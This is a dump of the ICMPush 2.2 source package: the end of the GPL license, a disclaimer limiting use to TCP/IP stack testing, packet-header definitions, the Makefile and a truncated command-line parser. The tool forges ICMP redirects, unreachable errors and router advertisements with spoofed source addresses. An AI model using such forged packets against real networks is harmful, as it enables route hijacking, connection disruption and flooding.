(or with a work based on the Program) on a volume of a storage or distribution medium does not bring the other work under the scope of this License. 3. 
You may copy and distribute the Program (or a work based on it, under Section 2) in object code or executable form under the terms of Sections 1 and 2 above provided that you also do one of the following: a) Accompany it with the complete corresponding machine-readable source code, which must be distributed under the terms of Sections 1 and 2 above on a medium customarily used for software interchange; or, b) Accompany it with a written offer, valid for at least three years, to give any third party, for a charge no more than your cost of physically performing source distribution, a complete machine-readable copy of the corresponding source code, to be distributed under the terms of Sections 1 and 2 above on a medium customarily used for software interchange; or, c) Accompany it with the information you received as to the offer to distribute corresponding source code. (This alternative is allowed only for noncommercial distribution and only if you received the program in object code or executable form with such an offer, in accord with Subsection b above.) The source code for a work means the preferred form of the work for making modifications to it. For an executable work, complete source code means all the source code for all modules it contains, plus any associated interface definition files, plus the scripts used to control compilation and installation of the executable. However, as a special exception, the source code distributed need not include anything that is normally distributed (in either source or binary form) with the major components (compiler, kernel, and so on) of the operating system on which the executable runs, unless that component itself accompanies the executable. 
If distribution of executable or object code is made by offering access to copy from a designated place, then offering equivalent access to copy the source code from the same place counts as distribution of the source code, even though third parties are not compelled to copy the source along with the object code. 4. You may not copy, modify, sublicense, or distribute the Program except as expressly provided under this License. Any attempt otherwise to copy, modify, sublicense or distribute the Program is void, and will automatically terminate your rights under this License. However, parties who have received copies, or rights, from you under this License will not have their licenses terminated so long as such parties remain in full compliance. 5. You are not required to accept this License, since you have not signed it. However, nothing else grants you permission to modify or distribute the Program or its derivative works. These actions are prohibited by law if you do not accept this License. Therefore, by modifying or distributing the Program (or any work based on the Program), you indicate your acceptance of this License to do so, and all its terms and conditions for copying, distributing or modifying the Program or works based on it. 6. Each time you redistribute the Program (or any work based on the Program), the recipient automatically receives a license from the original licensor to copy, distribute or modify the Program subject to these terms and conditions. You may not impose any further restrictions on the recipients' exercise of the rights granted herein. You are not responsible for enforcing compliance by third parties to this License. 7. If, as a consequence of a court judgment or allegation of patent infringement or for any other reason (not limited to patent issues), conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of this License, they do not excuse you from the conditions of this License. 
If you cannot distribute so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not distribute the Program at all. For example, if a patent license would not permit royalty-free redistribution of the Program by all those who receive copies directly or indirectly through you, then the only way you could satisfy both it and this License would be to refrain entirely from distribution of the Program. If any portion of this section is held invalid or unenforceable under any particular circumstance, the balance of the section is intended to apply and the section as a whole is intended to apply in other circumstances. It is not the purpose of this section to induce you to infringe any patents or other property right claims or to contest validity of any such claims; this section has the sole purpose of protecting the integrity of the free software distribution system, which is implemented by public license practices. Many people have made generous contributions to the wide range of software distributed through that system in reliance on consistent application of that system; it is up to the author/donor to decide if he or she is willing to distribute software through any other system and a licensee cannot impose that choice. This section is intended to make thoroughly clear what is believed to be a consequence of the rest of this License. 8. If the distribution and/or use of the Program is restricted in certain countries either by patents or by copyrighted interfaces, the original copyright holder who places the Program under this License may add an explicit geographical distribution limitation excluding those countries, so that distribution is permitted only in or among countries not thus excluded. In such case, this License incorporates the limitation as if written in the body of this License. 9. 
The Free Software Foundation may publish revised and/or new versions of the General Public License from time to time. Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or concerns. Each version is given a distinguishing version number. If the Program specifies a version number of this License which applies to it and "any later version", you have the option of following the terms and conditions either of that version or of any later version published by the Free Software Foundation. If the Program does not specify a version number of this License, you may choose any version ever published by the Free Software Foundation. 10. If you wish to incorporate parts of the Program into other free programs whose distribution conditions are different, write to the author to ask for permission. For software which is copyrighted by the Free Software Foundation, write to the Free Software Foundation; we sometimes make exceptions for this. Our decision will be guided by the two goals of preserving the free status of all derivatives of our free software and of promoting the sharing and reuse of software generally. NO WARRANTY 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 12. 
IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. END OF TERMS AND CONDITIONS Appendix: How to Apply These Terms to Your New Programs If you develop a new program, and you want it to be of the greatest possible use to the public, the best way to achieve this is to make it free software which everyone can redistribute and change under these terms. To do so, attach the following notices to the program. It is safest to attach them to the start of each source file to most effectively convey the exclusion of warranty; and each file should have at least the "copyright" line and a pointer to where the full notice is found. Copyright (C) 19yy This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA. Also add information on how to contact you by electronic and paper mail. 
If the program is interactive, make it output a short notice like this when it starts in an interactive mode: Gnomovision version 69, Copyright (C) 19yy name of author Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. This is free software, and you are welcome to redistribute it under certain conditions; type `show c' for details. The hypothetical commands `show w' and `show c' should show the appropriate parts of the General Public License. Of course, the commands you use may be called something other than `show w' and `show c'; they could even be mouse-clicks or menu items--whatever suits your program. You should also get your employer (if you work as a programmer) or your school, if any, to sign a "copyright disclaimer" for the program, if necessary. Here is a sample; alter the names: Yoyodyne, Inc., hereby disclaims all copyright interest in the program `Gnomovision' (which makes passes at compilers) written by James Hacker. , 1 April 1989 Ty Coon, President of Vice This General Public License does not permit incorporating your program into proprietary programs. If your program is a subroutine library, you may consider it more useful to permit linking proprietary applications with the library. If this is what you want to do, use the GNU Library General Public License instead of this License. icmpush-2.2.orig/SITES0100644000175000017500000000015106664230654012727 0ustar domdom Primary site: - http://hispahack.ccc.de Secondary site: - http://packetstorm.genocide2600.com icmpush-2.2.orig/LICENSE0120777000175000017500000000000007160153064014146 2COPYINGustar domdomicmpush-2.2.orig/IMPORTANT0100644000175000017500000000072306633542175013422 0ustar domdom/***************************************************************************/ /* I released this program for evaluation of TCP/IP stacks *ONLY*. Take it */ /* like a little tool to improve your system security, not for cracking, */ /* disturbing or flooding another systems. 
This can be a crime on certain */ /* countries. */ /***************************************************************************/icmpush-2.2.orig/compat.h0100644000175000017500000001536206662417130013555 0ustar domdom/***************************************************************************/
/* COMPAT.H v1.8                                                           */
/* Private declarations of the IPv4, ICMP, UDP, TCP and ICMP echo header   */
/* layouts, plus the ICMP type numbers, size macros and defaults that the  */
/* rest of the program refers to.                                          */
/***************************************************************************/

#ifndef __MY_COMPAT_H__
#define __MY_COMPAT_H__

/* IPv4 packet header */
/* The order of the two 4-bit fields depends on _BIT_FIELDS_LTOH. */
struct ip2
{
#ifdef _BIT_FIELDS_LTOH
  u_char  ip_hl:4,      /* Header length in 32-bit words */
          ip_v:4;       /* IP version */
#else
  u_char  ip_v:4,       /* IP version */
          ip_hl:4;      /* Header length in 32-bit words */
#endif
  u_char  ip_tos;       /* Type of service */
  /* NOTE(review): ip_len and ip_off are declared as signed short, so     */
  /* values above 32767 read back negative - confirm how callers compare. */
  short   ip_len;       /* Total length including data */
  u_short ip_id;        /* IP packet identifier */
  short   ip_off;       /* Offset when fragmented (see IP_MF below) */
  u_char  ip_ttl;       /* Time To Live */
  u_char  ip_p;         /* Protocol of the data field */
  u_short ip_sum;       /* Checksum */
  struct in_addr ip_src,   /* Source */
                 ip_dst;   /* Destination */
};

/* ICMP packet header */
/* Fixed type/code/checksum part, then one union for the second header    */
/* word (icmp_hun) and one union for the data that follows (icmp_dun).    */
/* The icmp_* macros below give short names to the nested members.        */
/* NOTE(review): the u_long members (ih_reserved, id_mask) are 64 bits    */
/* wide where unsigned long is 64 bits, which would also change           */
/* TDATA_ADDRESS below - confirm the sizes on the target platform.        */
struct icmp2
{
  struct icmp_hdr
  {
    u_char  icmp_type;
    u_char  icmp_code;
    u_short icmp_cksum;
  } icmp_hdr;
  union
  {
    u_char ih_pptr;
    struct in_addr ih_gwaddr;
    struct ih_idseq
    {
      n_short icd_id;
      n_short icd_seq;
    } ih_idseq;
    u_long ih_reserved;
    struct ih_rdiscovery
    {
      u_char  num_addr;
      u_char  addr_entry_size;
      u_short lifetime;
    } ih_rdiscovery;
  } icmp_hun;
  union
  {
    struct id_ts
    {
      n_time its_otime;
      n_time its_rtime;
      n_time its_ttime;
    } id_ts;
    struct id_ip
    {
      struct ip2 idi_ip;
    } id_ip;
    u_long id_mask;
    char   id_data[1];
    struct id_rdiscovery
    {
      struct in_addr router_addr;
      struct in_addr pref_level;
    } id_rdiscovery;
  } icmp_dun;
};

#define icmp_type               icmp_hdr.icmp_type
#define icmp_code               icmp_hdr.icmp_code
#define icmp_cksum              icmp_hdr.icmp_cksum
#define icmp_pptr               icmp_hun.ih_pptr
#define icmp_gwaddr             icmp_hun.ih_gwaddr
#define icmp_id                 icmp_hun.ih_idseq.icd_id
#define icmp_seq                icmp_hun.ih_idseq.icd_seq
#define icmp_reserved           icmp_hun.ih_reserved
#define icmp_num_addr           icmp_hun.ih_rdiscovery.num_addr
#define icmp_addr_entry_size    icmp_hun.ih_rdiscovery.addr_entry_size
#define icmp_lifetime           icmp_hun.ih_rdiscovery.lifetime
#define icmp_otime              icmp_dun.id_ts.its_otime
#define icmp_rtime              icmp_dun.id_ts.its_rtime
#define icmp_ttime              icmp_dun.id_ts.its_ttime
#define icmp_ip                 icmp_dun.id_ip.idi_ip
#define icmp_mask               icmp_dun.id_mask
#define icmp_data               icmp_dun.id_data
#define icmp_rdiscovery         icmp_dun.id_rdiscovery
#define icmp_rdisc_router       icmp_dun.id_rdiscovery.router_addr
#define icmp_rdisc_pref         icmp_dun.id_rdiscovery.pref_level

/* UDP packet header */
struct udp_hdr
{
  u_short source;       /* Source port */
  u_short dest;         /* Destination port */
  short   uh_ulen;      /* Length */
  u_short uh_sum;       /* Checksum */
};

/* TCP packet header */
/* Only the two ports and the sequence number are declared here. */
struct tcp_hdr
{
  u_short source;       /* Source port */
  u_short dest;         /* Destination port */
  u_long  seq;          /* Sequence number */
};

/* ICMP ECHO packet header */
struct echo_hdr
{
  u_char  type;
  u_char  code;
  u_short cksum;
  u_short id;
  u_short seq;
};

/* ICMP error data field */
/* One of the three transport headers above; TCAB_64DATA is its size. */
union data_hdr
{
  struct tcp_hdr  cab_tcp;
  struct udp_hdr  cab_udp;
  struct echo_hdr cab_echo;
};

/* Size of each header / data layout declared above. */
#define TCAB_IP         sizeof(struct ip2)
#define TCAB_ICMP       sizeof(struct icmp2)
#define TCAB_UDP        sizeof(struct udp_hdr)
#define TCAB_TCP        sizeof(struct tcp_hdr)
#define TCAB_ECHO       sizeof(struct echo_hdr)
#define TCAB_ICMP_MSG   TCAB_ECHO
#define TCAB_64DATA     sizeof(union data_hdr)
#define TDATA_TIMESTAMP sizeof(struct id_ts)
#define TDATA_ADDRESS   sizeof(u_long)
#define TCAB_RDISC      sizeof(struct ih_rdiscovery)
#define TDATA_RDISC     sizeof(struct id_rdiscovery)

/* ICMP errors ... */
#define ICMP_DEST_UNREACH       3
#define ICMP_SOURCE_QUENCH      4
#define ICMP_REDIRECT           5
#define ICMP_TIME_EXCEEDED      11
#define ICMP_PARAM_PROB         12

/* ICMP information messages ... */
#define ICMP_ECHO_REPLY         0
#define ICMP_ECHO_REQUEST       8
#define ICMP_ROUTER_ADVERT      9
#define ICMP_ROUTER_SOLICIT     10
#define ICMP_TIMESTAMP          13
#define ICMP_TIMESTAMP_REPLY    14
#define ICMP_INFO_REQUEST       15
#define ICMP_INFO_REPLY         16
#define ICMP_ADDRESS            17
#define ICMP_ADDRESS_REPLY      18

#define TTL_DFL         254     /* Time To Live default */
#define TIMEOUT_DFL     5       /* Timeout default, secs */

/* NOTE(review): outside SOLARIS, SIZE_BIG (75000) is larger than any      */
/* value the 16-bit ip_len field above can hold - confirm that every       */
/* length derived from it is range-checked before it is stored or used    */
/* to size a buffer.                                                       */
#ifdef SOLARIS                  /* Maximum packet size */
#define SIZE_BIG        65535
#else
#define SIZE_BIG        75000
#endif

#define LIFETIME_DFL    1800    /* Lifetime default of a Router Advertisement */
#define PREFERENCE_DFL  0       /* Preference default of a Router Advertisement*/

/* Number of router entries of TDATA_RDISC bytes that fit in SIZE_BIG     */
/* after the IP header, the ICMP header and the router discovery header.  */
/* The result has the type of a sizeof expression, not int.               */
#define MAX_ROUTERS     ( ( SIZE_BIG - TCAB_IP - sizeof(struct icmp_hdr) \
                          - TCAB_RDISC ) / TDATA_RDISC )

#define ICMP_ERROR       1
#define ICMP_INFO        0
#define ICMP_ERR_DFL_TOS 0

#define NO_REPLY        255     /* ICMP type that doesn't have a reply function */

#define IP_MF           0x2000  /* IP More Fragments flag */

#endif
icmpush-2.2.orig/mtu.h0100644000175000017500000000037106662420101013061 0ustar domdom
#ifndef __MTU_H__
#define __MTU_H__

/* One network interface: name, flags, MTU and address. */
struct mi_ifaz
{
  char  ifaz_nombre[IFNAMSIZ];  /* name, at most IFNAMSIZ bytes */
  short ifaz_flags;             /* flags */
  int   ifaz_mtu;               /* MTU */
  struct sockaddr ifaz_ip;      /* address */
};

#define MTU_DFL 1500            /* presumably the MTU used when none is found - confirm in mtu.c */

#endif
icmpush-2.2.orig/Makefile0100644000175000017500000000367506662513776013602 0ustar domdom# # Makefile for ICMPush v2.2 # Tested on Linux 2.0.35, 2.2.1 (gcc v2.7.2.3) and Solaris 2.5.1 SPARC # (gcc v2.7.2.3) # # Compiler CC = gcc # Install directory INST_DIR = /usr/local/bin # English man directory MAN_DIR = /usr/local/man/man8 # Program Language. # If you need spanish uncomment the next variable, else other English. #LNG = -DSPANISH # Compiler flags CCFLAGS = -Wall -O3 $(LNG) # If you get problems with the message "undefined reference to __inet_aton" # you has replaced the original "includes" with the "includes" that # comes with the bind 8.1.2 distribution, then you must put the # complete path to the library. # Leave this variable blank else other.
LIBBINDDIR = # LIBBINDIR = /usr/local/lib/libbind.a ###################################################################### # From here to the end is not necessary to modify. Thanx :) # LIBSOLARIS = -lsocket -lresolv -lnsl SOURCES = icmpush.c help.c version.c parser.c mtu.c OBJS = icmpush.o help.o version.o parser.o mtu.o default: @echo "" @echo " To compile the ICMPush program for Linuz:" @echo " make linuz" @echo "" @echo " To compile the ICMPush program for Solaris:" @echo " make solaris" @echo "" @echo " To delete object files, executables and *~:" @echo " make clean" @echo "" @echo " To install the ICMPush executable file and the man page:" @echo " make install" @echo "" @echo " Enjoy! ;)" @echo "" @echo " Slayer." linuz: icmp-lin cuenta-prog icmp-lin: $(CC) $(CCFLAGS) -DLINUX -D_BIT_FIELDS_LTOH -c $(SOURCES) $(CC) $(CCFLAGS) -o icmpush $(OBJS) $(LIBBINDDIR) cuenta-prog: $(CC) $(CCFLAGS) -c cuenta.c $(CC) $(CCFLAGS) -o cuenta cuenta.o solaris: icmp-sol cuenta-prog icmp-sol: $(CC) $(CCFLAGS) -DSOLARIS -c $(SOURCES) $(CC) $(CCFLAGS) -o icmpush $(OBJS) $(LIBBINDDIR) $(LIBSOLARIS) install: cp icmpush $(INST_DIR) cp icmpush.8 $(MAN_DIR) clean: @rm -f icmpush cuenta *.o *~ icmpush-2.2.orig/version.c0100644000175000017500000000017106663232712013744 0ustar domdom#ifdef SPANISH char *version="v2.2 por Slayer, 19/02/1999"; #else char *version="v2.2 by Slayer, 1999/02/19"; #endif icmpush-2.2.orig/parser.c0100644000175000017500000004207106663233770013565 0ustar domdom/********************************************************/ /* These are the functions that parse the command line */ /* arguments. */ /* The routers IP addresses of a Router Advertisement */ /* is implemented on a linked list. 
*/
/********************************************************/

/* NOTE(review): the header names of the bare #include lines below are */
/* missing on this page; they are kept exactly as they appear.         */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include "compat.h"
#include "packet.h"
#include "misc.h"

#ifdef SOLARIS
extern char *sys_errlist[];
#endif

/******************/
/* ICMP codes ... */
/******************/
/* Names accepted by the -c option for the three ICMP error types that  */
/* take a named code. existe_codigo() returns the index of the matching */
/* name and parsea_args() stores that index as the ICMP code, so the    */
/* order of the entries is significant. Each table ends with "max".     */

/* Codes for -red (ICMP Redirect). */
char *cod_redirect[]={ "net", "host", "serv-net", "serv-host", "max" };

/* Codes for -tx (ICMP Time Exceeded). */
char *cod_time[]={ "ttl", "frag", "max" };

/* Codes for -du (ICMP Destination Unreach). */
char *cod_unreach[]={ "net-unreach", "host-unreach", "prot-unreach",
                      "port-unreach", "frag-needed", "sroute-fail",
                      "net-unknown", "host-unknown", "host-isolated",
                      "net-ano", "host-ano", "net-unr-tos", "host-unr-tos",
                      "com-admin-prohib", "host-precedence-viol",
                      "precedence-cutoff", "max" };
/**********************/
/* ... end ICMP codes */
/**********************/

/* Flags defined in another file and updated by parsea_args(). */
extern u_short is_pattern;
extern u_short resolve;
extern u_short verbose;
extern u_short more_verbose;
extern char *version;
extern char *prog;

/* Set to 1 by parsea_args() when "-gbg max" is given. */
char max_gbg = 0;

/***************************/
/* Functions prototypes... */
/***************************/
void add_router(struct my_pack *, u_long, u_long );
int existe_host( char *, u_long * );
int existe_codigo( char *, char **, int );
void parsea_args( char **, struct my_pack * );
extern void salir( int );
extern void help( void );
#ifdef SOLARIS
extern int inet_aton( char *, struct in_addr * );
#endif
extern int get_iface_out( struct sockaddr_in *, struct sockaddr_in * );
void recorre_lista(struct my_pack *);
/*******************************/
/* ...end functions prototypes */
/*******************************/

/************************/
/* Yeaaaaaaaahhh !!     */
/* A parser function !!
*/
/************************/
/* Parse the command line into *packet.                                  */
/*                                                                        */
/*   args   - argument vector, NULL terminated; args[0] is skipped.       */
/*   packet - structure that receives the ICMP type, code, addresses,     */
/*            ports and the other option values.                          */
/*                                                                        */
/* Two passes are made: the first only looks for the verbose flags, the   */
/* second handles every option. The last argument is taken as the        */
/* destination host. Every error path calls salir() with a numeric code   */
/* (salir() is defined elsewhere; presumably it reports the error and     */
/* terminates - confirm).                                                 */
/*                                                                        */
/* The function tests packet fields against the values 1 (addresses),     */
/* 0 (ip_spoof) and 255 (tipo_icmp) to detect options that were not       */
/* given; presumably the caller stores those values before calling -      */
/* confirm.                                                               */
/*                                                                        */
/* NOTE(review): numeric option values are converted with atoi()/atol()   */
/* and stored without any range or syntax check, except for -ptr.         */
/* NOTE(review): addresses are written through a (u_long *) cast of the   */
/* destination field, while existe_host() copies the size of a            */
/* struct in_addr - confirm the field types in packet.h.                  */
/************************/
void parsea_args( char **args, struct my_pack *packet )
{
  int max_cod=0, ptr;
  char *code_icmp="NOTHING", **array_aux=NULL, *punt, *router, *pref;
  char **aux_args = args;
  u_long router_addr, preference;
  struct sockaddr_in aux;
  struct protoent *proto;

  /**************************************/
  /* This first nasty thing is looking  */
  /* for the verbose options. This      */
  /* makes the output more clear before */
  /* parsing the rest of options.       */
  /* Ok, is'nt a good thing but it      */
  /* works. ;)                          */
  /**************************************/
  ++aux_args;
  while ( *aux_args != (char *)NULL )
  {
     if ( !strcmp("-v", *aux_args) || !strcmp("--verbose",*aux_args) )
     {
        verbose = 1;
        aux_args++;
        continue;
     }
     if ( !strcmp("-vv", *aux_args) || !strcmp("--more_verbose",*aux_args) )
     {
        more_verbose = verbose = 1;
        break;                  /* nothing more to learn from this pass */
     }
     aux_args++;
  }

  /************************/
  /* Here begins the true */
  /* parser. :)           */
  /************************/
  ++args;
  while ( *args != (char *)NULL )
  {
     /* Options that take a value advance args with *++args and stop */
     /* through salir() when the value is missing.                   */
     if ( !strcmp("-sp", *args) || !strcmp("--spoof", *args) )
     {
        if ( *++args == NULL )
           salir(11);
        if ( existe_host( *args, (u_long *)&(packet->ip_spoof) ) )
           salir(11);
        args++;
        continue;
     }

     /* The code name is only remembered here; it is resolved in the */
     /* switch at the end, once the ICMP type is known.              */
     if ( !strcmp("-c", *args) || !strcmp("--code", *args) )
     {
        if ( *++args == NULL )
           salir(7);
        code_icmp = *args;
        args++;
        continue;
     }

     if ( !strcmp("-prot", *args) || !strcmp("--protocol",*args) )
     {
        if ( *++args == NULL )
           salir(14);
        if ( ( proto = getprotobyname( *args )) == NULL )
           salir(14);
        packet->protocol = proto->p_proto;
        args++;
        continue;
     }

     if ( !strcmp("-psrc", *args) || !strcmp("--port_src",*args) )
     {
        if ( *++args == NULL )
           salir(19);
        packet->p_origen = atoi(*args);   /* not range checked */
        args++;
        continue;
     }

     if ( !strcmp("-pdst", *args) || !strcmp("--port_dest",*args) )
     {
        if ( *++args == NULL )
           salir(20);
        packet->p_destino = atoi(*args);  /* not range checked */
        args++;
        continue;
     }

     if ( !strcmp("-orig", *args) || !strcmp("--orig_host", *args) )
     {
        if ( *++args == NULL )
           salir(8);
        if ( existe_host( *args, (u_long *)&(packet->orig) ) )
           salir(8);
        args++;
        continue;
     }

     /* NOTE(review): there is no continue or exit after help(), so */
     /* presumably help() does not return - confirm in help.c.      */
     if ( !strcmp("-h", *args) || !strcmp("--help", *args) )
     {
        help();
     }

     if ( !strcmp("-V",*args) || !strcmp("--version",*args) )
     {
        fprintf(stdout, "%s %s\n", prog, version );
        exit(0);
     }

     /* Type options. The three types with named codes also select the */
     /* table that -c is looked up in; MAX() is defined outside this   */
     /* file.                                                          */
     if ( !strcmp("-du",*args) || !strcmp("--dest_unreach",*args) )
     {
        packet->tipo_icmp = ICMP_DEST_UNREACH;
        array_aux = cod_unreach;
        max_cod = MAX(cod_unreach);
        args++;
        continue;
     }

     if ( !strcmp("-sq", *args) || !strcmp("--src_quench",*args) )
     {
        packet->tipo_icmp = ICMP_SOURCE_QUENCH;
        packet->cod_icmp = 0;
        args++;
        continue;
     }

     if ( !strcmp("-red", *args) || !strcmp("--redirect",*args) )
     {
        packet->tipo_icmp = ICMP_REDIRECT;
        array_aux = cod_redirect;
        max_cod = MAX(cod_redirect);
        args++;
        continue;
     }

     if ( !strcmp("-tx", *args) || !strcmp("--time_exc",*args) )
     {
        packet->tipo_icmp = ICMP_TIME_EXCEEDED;
        array_aux = cod_time;
        max_cod = MAX(cod_time);
        args++;
        continue;
     }

     if ( !strcmp("-tstamp", *args) || !strcmp("--timestamp",*args) )
     {
        packet->tipo_icmp = ICMP_TIMESTAMP;
        packet->cod_icmp = 0;
        args++;
        continue;
     }

     if ( !strcmp("-mask", *args) || !strcmp("--mask_req",*args) )
     {
        packet->tipo_icmp = ICMP_ADDRESS;
        packet->cod_icmp = 0;
        args++;
        continue;
     }

     if ( !strcmp("-info", *args) || !strcmp("--info_req",*args) )
     {
        packet->tipo_icmp = ICMP_INFO_REQUEST;
        packet->cod_icmp = 0;
        args++;
        continue;
     }

     if ( !strcmp("-rts", *args) || !strcmp("--router_solicit",*args) )
     {
        packet->tipo_icmp = ICMP_ROUTER_SOLICIT;
        packet->cod_icmp = 0;
        args++;
        continue;
     }

     /* -rta takes "router[/preference]". strtok() splits the argument */
     /* in place, so the argv string itself is modified.               */
     if ( !strcmp("-rta", *args) || !strcmp("--router_advert",*args) )
     {
        packet->tipo_icmp = ICMP_ROUTER_ADVERT;
        packet->cod_icmp = 0;
        if ( *++args == NULL )
           salir(26);
        punt = *args;
        if ( ( router = strtok( punt, "/")) != NULL )
        {
           /* NOTE(review): router_addr is an uninitialised u_long and  */
           /* existe_host() copies only the size of a struct in_addr    */
           /* into it - confirm no stale bytes reach add_router().      */
           if ( existe_host( router, (u_long *)&(router_addr) ) )
              salir(26);
           if ( (pref = strtok( NULL, "/")) != NULL )
              preference = atoi(pref);
           else
              preference = PREFERENCE_DFL;
           add_router( packet, router_addr, preference );
        }
        else
           /* strtok() does not set errno, so the text printed after */
           /* the arrow is whatever errno held before.                */
           fprintf(stderr, "strtok() error -> %s\n", sys_errlist[errno]);
        args++;
        continue;
     }

     if ( !strcmp("-lt", *args) || !strcmp("--lifetime",*args) )
     {
        if ( *++args == NULL )
           salir(21);
        packet->lifetime = atoi(*args);
        args++;
        continue;
     }

     if ( !strcmp("-echo", *args) || !strcmp("--echo_req",*args) )
     {
        packet->tipo_icmp = ICMP_ECHO_REQUEST;
        packet->cod_icmp = 0;
        args++;
        continue;
     }

     /* Same error code (21) as -lt above. */
     if ( !strcmp("-to", *args) || !strcmp("--timeout",*args) )
     {
        if ( *++args == NULL )
           salir(21);
        packet->timeout = atoi(*args);
        args++;
        continue;
     }

     if ( !strcmp("-gw", *args) || !strcmp("--gateway",*args) )
     {
        if ( *++args == NULL )
           salir(5);
        if ( existe_host( *args, (u_long *)&(packet->gway) ) )
           salir(5);
        args++;
        continue;
     }

     if ( !strcmp("-dest", *args) || !strcmp("--route_dest",*args) )
     {
        if ( *++args == NULL )
           salir(6);
        if ( existe_host( *args, (u_long *)&(packet->dest_red) ) )
           salir(6);
        args++;
        continue;
     }

     /* -id and -seq are stored in the same fields as -psrc and -pdst. */
     if ( !strcmp("-id", *args) || !strcmp("--echo_id",*args) )
     {
        if ( *++args == NULL )
           salir(22);
        packet->p_origen = atoi(*args);
        args++;
        continue;
     }

     if ( !strcmp("-seq", *args) || !strcmp("--echo_seq",*args) )
     {
        if ( *++args == NULL )
           salir(23);
        packet->p_destino = atoi(*args);
        args++;
        continue;
     }

     /* The pattern points into argv (no copy is made); is_pattern is  */
     /* toggled, so giving -pat twice switches it off again.           */
     if ( !strcmp("-pat", *args) || !strcmp("--pattern",*args) )
     {
        if ( *++args == NULL )
           salir(24);
        packet->pattern = *args;
        is_pattern = !is_pattern;
        packet->size_pattern = strlen(*args);
        if ( packet->size_pattern > ( SIZE_BIG - TCAB_IP - TCAB_ICMP_MSG ) )
           salir(18);   /* Data 2 big :) */
        args++;
        continue;
     }

     /* NOTE(review): a numeric -gbg value is taken from atol() with no */
     /* upper bound here; presumably it is limited where the packet is  */
     /* built - confirm.                                                */
     if ( !strcmp("-gbg", *args) || !strcmp("--garbage",*args) )
     {
        if ( *++args == NULL )
           salir(27);
        if ( !strcmp("max", *args) )
        {
           packet->garbage = SIZE_BIG;
           max_gbg = 1;
        }
        else
           packet->garbage = (u_long)atol(*args);
        args++;
        continue;
     }

     if ( !strcmp("-param", *args) || !strcmp("--param_problem",*args) )
     {
        packet->tipo_icmp = ICMP_PARAM_PROB;
        packet->cod_icmp = 0;
        args++;
        continue;
     }

     /* The only numeric option that is range checked: 0..255. */
     if ( !strcmp("-ptr", *args) || !strcmp("--pointer",*args) )
     {
        if ( *++args == NULL )
           salir(28);
        if ( (ptr = atoi(*args)) > 255 )
           salir(28);
        if ( ptr < 0 )
           salir(28);
        packet->pointer = ptr;
        args++;
        continue;
     }

     if ( !strcmp("-n", *args) || !strcmp("--no_resolve",*args) )
     {
        resolve = 0;
        args++;
        continue;
     }

     /* The verbose flags were already handled by the first pass. */
     if ( !strcmp("-v", *args) || !strcmp("--verbose",*args) )
     {
        args++;
        continue;
     }

     if ( !strcmp("-vv", *args) || !strcmp("--more_verbose",*args) )
     {
        args++;
        continue;
     }

     /* Anything unrecognised in the last position is the destination. */
     if ( *(args+1) == NULL )
     {
        if ( packet->tipo_icmp == 255 )   /* Bad icmp type... */
           salir(4);
        if ( existe_host( *args,
                          (u_long *)&(packet->destino.sin_addr.s_addr) ) )
           salir(13);
        break;
     }

     /* Unknown argument that is not the last one: reported only in */
     /* verbose mode, then skipped.                                  */
     if ( verbose )
#ifdef SPANISH
        fprintf(stdout,"¿Qué c*j*n*s es esto? -> %s\n", *args);
#else
        fprintf(stdout,"What the hell is it? -> %s\n", *args);
#endif
     args++;
  } /* End while (args) */

  if ( more_verbose )
     recorre_lista(packet);

  if ( packet->destino.sin_addr.s_addr == 1 )  /* Bad destination host...*/
     salir(13);

  if ( packet->tipo_icmp == 255 )  /* Bad icmp type... */
     salir(4);

  /* No -sp given: ask get_iface_out() for an address and use it when */
  /* the call returns 0.                                              */
  if ( packet->ip_spoof == 0 )
  {
     if ( !get_iface_out( (struct sockaddr_in *)&packet->destino,
                          (struct sockaddr_in *)&aux ) )
        packet->ip_spoof = aux.sin_addr.s_addr;
  }

  /* Resolve the ICMP code now that the type is known.                 */
  /* NOTE(review): the == -1 tests only work if cod_icmp has a signed  */
  /* type that can hold -1 - confirm in packet.h.                      */
  switch ( packet->tipo_icmp )
  {
     case ICMP_REDIRECT:
        if ( (packet->cod_icmp = existe_codigo(code_icmp, array_aux,
                                               max_cod)) == -1 )
           salir(7);
        if ( packet->dest_red == 1 )
           salir(6);
        if ( packet->gway == 1 )
           packet->gway = packet->ip_spoof;
        if (packet->orig == 1 )
